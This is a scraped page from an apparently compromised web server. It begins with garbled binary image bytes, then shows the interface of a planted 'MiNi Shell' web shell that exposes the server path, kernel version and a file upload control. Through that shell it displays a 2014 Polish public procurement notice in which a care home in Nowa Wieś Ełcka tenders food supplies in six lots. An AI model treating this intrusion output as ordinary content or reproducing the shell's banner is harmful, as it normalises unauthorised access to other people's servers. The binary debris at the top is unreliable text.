JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140611/125815-N-2014.html

<p class="kh_header"><b>Nowa Wieś Ełcka: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 125815 - 2014; data zamieszczenia: 11.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Nowej Wsi Ełckiej , ul. Lipowa 1, 19-321 Nowa Wieś Ełcka, woj. warmińsko-mazurskie, tel. 087 6197770, 6197779, faks 087 6197490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsnwe.fantex.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Dom Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi dostawa artykułów spożywczych dla potrzeb Domu Pomocy Społecznej. Przedmiot zamówienia podzielony został odpowiednio na 6 części, zgodnie z załącznikiem nr 1: (część 1 dostawa pieczywa), (część 2 dostawa mleka i jego przetworów), (część 3 dostawa produktów spożywczych), (część 4 dostawa ryb, przetworów rybnych i mrożonek), (część 5 dostawa mięsa i wędlin), (część 6 dostawa warzyw i owoców ), które stanowią integralną część SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.61.25.00-6, 15.50.00.00-3, 15.80.00.00-6, 15.20.00.00-0, 15.10.00.00-9, 03.20.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w jej przedmiocie lub terminie wykonania w następujących przypadkach: 
a) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego;
b) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
c) z powodu zmiany uwarunkowań prawnych i formalnych m.in. związanych ze zmianą podatku VAT
d) Zmiany wykonania umowy na skutek okoliczności, niezależnych i obiektywnych, których Zamawiający nie mógł przewidzieć w dacie sporządzenia SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsnwe.fantex.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej 
Nowa Wieś Ełcka
ul. Lipowa 1
19-300 Ełk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2014 godzina 09:00, miejsce: Dom Pomocy Społecznej 
Nowa Wieś Ełcka
ul. Lipowa 1
19-300 Ełk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Chleb zwykły 15000 kg
2 Chleb razowy zwykły lub ze słonecznikiem, soją, ziarnami (450g) 4000 szt
3 Bułka wrocławska (50g) 60000 szt
4 Bułki słodkie z marmoladą, budyniem, makiem, jagodami, jabłkiem, serem, pączek (100g) 7000 szt
5 Pączki (50g) 3400 szt
6 Bułka drożdżowa 300 kg
7 Bułka tarta (500g) 300 szt
8 Ciasto rolada z kremem 140 kg
9 Makowiec extra 60 kg
10 Ciasto ptasie mleczko 60 kg
12 Ciasto metrowiec 140 kg
13 Babka piaskowa w polewie czekoladowej 60 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mleka i jego przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 masło (200g) 82% tłuszczu 120 kg
2 mleko 3,2% 17000 l
3 śmietana 18% (400g) 3900 szt
4 ser żółty gouda, podlaski, edamski 900 kg
5 serek topiony (100g) z pieczarkami, szynką, ziołami, szczypiorkiem 6000 szt
6 twaróg półtłusty 1600 kg
7 serek homogenizowany (100g) 6000 szt
8 serek twarogowy do smarowania typu sourage (100g) 1500 szt
9 jogurt owocowy (150g) 18000 szt
10 jogurt naturalny typu greckiego (400 ml) 350 szt
11 jogurt naturalny ( 180g) 800 szt
12 maślanka naturalna (1l) 500 szt
13 kefir naturalny (180g) 3000 szt
14 margaryna z masłem (500g) 4500 szt
15 margaryna w kostce do pieczenia, smażenia (250g) 900 szt
16 drożdże (100g) 120 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Ryż 500 kg
2 Ryż paraboilet w saszetkach 400 szt
3 Mąka pszenna poznańska typ 500 900 kg
4 Mąka pszenna wrocławska typ 500 300 kg
5 Mąka ziemniaczana 180 kg
6 Kasza manna 200 kg
7 Kasza jęczmienna średnia 400 kg
8 Kasza jęczmienna mazurska w saszetkach (1kartonik 4 razy po 100g) 24 szt
9 Kasza gryczana prażona w saszetkach (1kartonik 4 razy po 100g) 24 szt 
10 Kleik ryżowy błyskawiczny (170g) 150 szt
11 Kaszka mleczno-ryżowa owocowa (230g) 400 szt
12 Kaszka ryżowa bezmleczna owocowa (180g) 200 szt
13 Płatki owsiane zwykłe (0,5kg) 120 kg
14 Budyń (40g) 500 szt
15 Kisiel (40g) 600 szt
16 Makaron z mąki durum nitki (500g) 200 kg
17 Makaron z mąki durum świderki, muszelki (500g) 500 kg
18 Herbata liściasta czarna assam (100g) 900 szt
19 Herbata liściasta earl grey 900 szt (100g)
20 Kawa zbożowa inka klasyczna mająca w składzie jęczmień, żyto, cykorię i buraki cukrowe (150g) 700 szt
21 Kakao (100g) 200 szt
22 Ocet spirytusowy 10% (0,5l) 180 szt
23 Musztarda (0,9l) kremska, chrzanowa, sarepska 500 szt
24 Ketchup mający w zawartości przynajmniej 160g pomidora w 100g ketchupu, łagodny i pikantny ( 500g) 700 szt
25 Majonez napoleoński (0,9l) 500 szt
26 Olej z pierwszego tłoczenia, filtrowany na zimno (1 l) 1500 szt
27 Szczaw krojony (240g) 600 szt
28 Ogórek konserwowy (0,9 l) 700 szt
29 Sałatka wielowarzywna marynowana mająca w składzie ogórek cebulę, paprykę i marchew(0,9l) 300 szt
30 Sok owocowy naturalny 100% bez cukru jabłkowe i pomarańczowe (1l) 1500 szt
31 Soczek owocowy przecierowy marchew, jabłko + dowolny smak owocu, mający w składzie przynajmniej 47% koncentratu owocowego 1500 szt
32 Syrop owocowy o zawartości ekstraktu ogólnego co najmniej 65% (440 mal) 1400 szt
33 Dżem wysoko słodzony : truskawkowy, wiśniowy, czarna porzeczka (280g) 900 szt
34 Dżem nisko słodzony brzoskwinia, wiśnia, truskawka (280g) 900 szt
35 Marmolada wieloowocowa twarda (1 kg) 350 szt
36 Płatki śniadaniowe z miodem, czekoladowe (500g) 100 szt
37 Chrzan śmietankowy (320g) 500 szt
38 Ćwikła z chrzanem (320g) 500 szt
39 Groszek konserwowy (400g) 500 szt
40 Czosnek granulowany 200 szt
41 Curry (20g) 240 szt
42 Galaretka owocowa (79g) 100 szt
43 Herbatniki petit-beaure (55g) 1800 szt
44 Liść laurowy (5g) 400 szt
45 Majeranek (6g) 500 szt
46 Papryka w proszku (16g) 250 szt
47 Pieprz ziołowy (20g) 700 szt
48 Pieprz naturalny (15g) 700 szt
49 Przyprawa w płynie (1l) typu magi 220 szt
50 Sos spaghetti (0,9l) 300 szt
51 Ziele angielskie (12g) 1400 szt
52 Cukier 3000 kg
53 Przyprawa typu jarzynka (500g) 220 kg
54 Cynamon 240 szt
55 Imbir 50 szt
56 Gałka muszkatołowa mielona 50 szt
57 Cukier waniliowy 300 szt
58 Miód naturalny wielokwiatowy (słoik 1,3 kg; 1 kg; 0,38 kg) 100 kg
59 Sól kamienna (1000g) 750 kg
60 Wafelki (100g) 900 szt
61 Pieczywo chrupkie bezglutenowe 220 szt
62 Mąka kukurydziana 20 kg
63 Czekolada mleczna (100g) 600 szt
64 Czekolada bez cukru dla diabetyków (100g) 70 szt
65 Kukurydza konserwowa  (400g) 150 szt
66 Makaron bezglutenowy (500g) 30 szt
67 Kasza jaglana (500g) 20 szt
68 Paszteciki sojowe z papryką, pieczarkami, pomidorami, koperkiem (105g)  100 szt
69 Kotlety sojowe (100g) 30 szt
70 Koncentrat pomidorowy 30% bez konserwantów (900 ml) 50 szt
71 Mleko ryżowe (1l) 50 szt
72 Mleko kokosowe (1l) 20 szt
73 Siemię lniane brązowe (400g) 5 szt
74 Tapioka (400g) 5 szt
75 Amarantus (1 kg) 5 kg
76 Ksylitol-cukier (1kg) 5 kg
77 Syrop klonowy (250g) 5 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa ryb, przetworów rybnych i mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Filety z miruny SHP (kawałki w tafli 230- 280g) 600 kg
2 Kostka (filet) rybna w panierce 350 kg
3 Paluszki (filet) rybne 350 kg
4 Śledź marynowany płaty 120 kg
5 Śledź po wiejsku marynowany 15 kg
6 Matias filety śledziowe w oleju 15 kg
7 Śledź solony płaty 120 kg
8 Paprykarz szczeciński (300g) 400 szt
9 Śledź w oleju (300g) 100 szt
10 Szprot w oleju (300g) 100 szt
11 Szprot w pomidorach (300g) 100 szt
12 Makrela w oleju (300g) 100 szt
13 Makrela w pomidorach (300 g) 100 szt
14 Sałatka rybna (300g) 400 szt
15 Makrela wędzona 500 kg
16 Marchew mrożona kostka 500 kg
17 Mieszanka kompotowa 4-składnikowa (śliwka z pestką, wiśnia z pestka, truskawka, porzeczka czerwona) 950 kg
18 Mieszanka kompotowa 7-składnikowa (śliwka z pestką, wiśnia z pestka, rabarbar, truskawka, porzeczka czerwona, porzeczka czarna) 950 kg
19 Mieszanka warzywna 400 kg
20 Truskawka mrożona 120 kg
21 Pyzy z mięsem 360 kg
22 Pierogi z truskawkami 180 kg
23 Pierogi z jabłkami 120 kg
24 Ruskie pierogi 60 kg
25 Pierogi z mięsem 120 kg
26 Pierogi z kapustą i grzybami 120 kg
27 Uszka z grzybami 60 kg
28 Kopytka 180 kg
29 Kalafior 500 kg
30 Brukselka 240 kg
31 Brokuły 240 kg
32 Fasolka szparagowa 380 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Szynka wp b/k 200 kg
2 Boczek wędzony parzony 120 kg
3 Żeberka mostki mięsne 120 kg
4 Flak wołowy krojony 65 kg
5 Ozory wp 100 kg
6 Boczek surowy b/ż 250 kg
7 Golonka wp surowa z/k 20 kg
8 Karczek wp b/k 200 kg
9 Łopatka wp b/k 600 kg
10 Nogi wp surowe 65 kg
11 Podgardle surowe bez skóry 60 kg
12 Serca wp 50 kg
13 Schab wp b/k 200 kg
14 Słonina surowa bez skóry 100 kg
15 Filet z kurczaka 180 kg
16 Udka z kurczaka 800 kg
17 Porcje rosołowe 1200 kg
18 Pachwina wp surowa 25 kg
19 Żołądki drobiowe 150 kg
20 Kurczak świeży 270 kg
21 Golonka prasowana-wędlina 100 kg
22 Wieprzowa II 130 kg
23 Konserwa wieprzowa, blokowa-sterylizowana o zawartości mięsa wieprzowego 85% (300g) 400 szt
24 Przysmak szynkowy 140 kg
25 Rolada drobiowa 150 kg
26 Kiełbasa parówkowa 250 kg
27 Parówki paluszki typu hot-dog 300 kg
28 Mortadela parzona 100 kg
29 Kiełbasa toruńska 300 kg
30 Kiełbasa śląska 250 kg
31 Kiełbasa biała surowa extra 270 kg
32 Szynka wieprzowa wędzona 300 kg
33 Szynka drobiowa-wędlina 200 kg
34 Mielonka wieprzowa -wędlina 400 kg
35 Polędwica sopocka 300 kg
36 Polędwica drobiowa 200 kg
37 Baleron 300 kg
38 Kiełbasa żywiecka 120 kg
39 Pieczeń wp 200 kg
40 Pasztet na wagę 200 kg
41 Kaszanka 180 kg
42 Pasztetowa w osłonce foliowej 120 kg
43 Pasztetowa we flaku 120 kg
44 Kiełbasa szynkowa 240 kg
45 Wątróbka drobiowa 150 kg
46 Łopatka wołowa b/k 100 kg
47 Pasztet (300g) 400 szt
48 Salami 120 kg
49 Salceson we flaku 140 kg
50 Kiełbasa palcówka 15 kg
51 Filet z indyka wędzony 100 kg
52 Szynka wieprzowa wędzona typu swojskiego, wysokogatunkowa 15 kg
53 Schab wędzony, wysokogatunkowy 15 kg
54 Kiełbasa krakowska sucha 15 kg
55 Boczek wędzony typu swojskiego, wysokogatunkowy 15 kg
56 Podudzie z kurczaka wędzone 100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Groch 100 kg
2 Ziemniak młody 15500 kg
3 Fasola 200 kg
4 Szczypior 700 szt
5 Por 100 kg
6 Marchew 1500 kg
7 Seler 90 kg
8 Pietruszka 90 kg
9 Buraki 650 kg
10 Botwina 160 pęczek
11 Ogórek świeży 2100 kg
12 Cebula młoda 700 kg
13 Brokuł 400 szt
14 Kalafior 400 szt
15 Pomidory 2400 kg
16 Kapusta pekińska 120 kg
17 Kapusta włoska 60 szt
18 Kapusta kiszona 300 kg
19 Kapusta czerwona 30 kg
20 Kapusta młoda 500 szt
21 Kapusta biała kg 200
22 Ogórek małosolny 900 kg
23 Ogórek kiszony 110 kg
24 Pieczarki 150 kg
25 Koper 1000 szt
26 Natka pietruszki 800 szt
27 Banany 700 kg
28 Jabłka 1500 kg
29 Jaja 1200 kg
30 Rzodkiewka 400 pęczek
31 Pomarańcze 200 kg
32 Śliwki fioletowe 600 kg
33 Biała rzodkiew 100 kg
34 Papryka świeża czerwona 40 kg
35 Wiśnie 200 kg
36 Cukinia 60 kg
37 Sałata masłowa 600 szt
38 Cytryny 150 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com